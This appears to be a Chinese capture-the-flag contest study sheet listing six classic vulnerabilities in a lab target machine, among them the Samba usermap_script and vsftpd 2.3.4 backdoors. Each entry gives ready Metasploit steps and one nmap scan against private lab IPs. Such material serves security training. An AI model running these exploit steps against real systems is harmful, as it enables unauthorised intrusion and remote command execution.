2021年星光国赛题
混战靶机漏洞利用
一、Samba MS-RPC Shell命令注入漏洞(445)
Samba 中负责在 SAM 数据库更新用户口令的代码未经过滤便将用户输入传输给了
/bin/sh。
如果在调用 smb.conf 中定义的外部脚本时,通过对 /bin/sh 的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以 nobody 用户的权限执行任意命令。
1. 在kali 中执行msfconsole,启动 metasploit
2. use exploit/multi/samba/usermap_script选择漏洞
3. set RHOST 192.168.56.102 设置要攻击的机器IP
4. run,开始攻击
5. 利用成功,执行uname -a验证
二、Vsftpd 源码包后门漏洞(21)
在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
1.在kali 中执行msfconsole,启动metasploit
2.use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞
3.set RHOST 192.168.56.102 设置要攻击的机器IP
4.run,开始攻击
5.利用成功,执行uname -a验证
三、UnreallRCd 后门漏洞(6667)
在2009年11月到2010年6月间分布于某些镜面站点的 UnreallRCd,在 DEBUG3DOLOG_SYSTEM 宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。
1.在kali中执行msfconsole,启动metasploit
2.use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞
3.set RHOST 192.168.56.102设置要攻击的机器IP
4.run,开始攻击
5.利用成功,执行uname -a验证
四、Java RMI SERVER 命令执行漏洞(1099)
Java RMI Serve 的 RMI 注册表和 RMI 激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
1.在kali中执行msfconsole,启动metasploit
2.use exploit/multi/misc/java_rmi_server,选择漏洞
3.set RHOST 192.168.56.102设置要攻击的机器IP
4.run,开始攻击
5.利用成功,得到 meterpreter shell
五、Distcc 后门漏洞(3632)
- nmap --script=vuln -p 3632 192.168.84.128
Distcc 用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是 xcode1.5 版本及其他版本的 distcc2.x 版本配置对于服务器端口的访问不限制。
1.在kali 中执行msfconsole,启动metasploit
2.msf>use exploit/unix/misc/distcc_exec选择漏洞
3.set RHOST 192.168.56.102 设置要攻击的机器IP
4.run,开始攻击
5.利用成功,执行id查看权限,uname -a验证服务器信息
六、PHP CGI 参数注入执行漏洞
GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
漏洞影响版本 php < 5.3.12 or php < 5.4.2
1.在kali中执行msfconsole,启动metasploit
2.msf>use exploit/multi/http/php_cgi_arg_injection 选择漏洞
3.set RHOST 192.168.56.102 设置要攻击的机器lP
4.run,开始攻击
5.meterpreter> Is 获得 meterpreter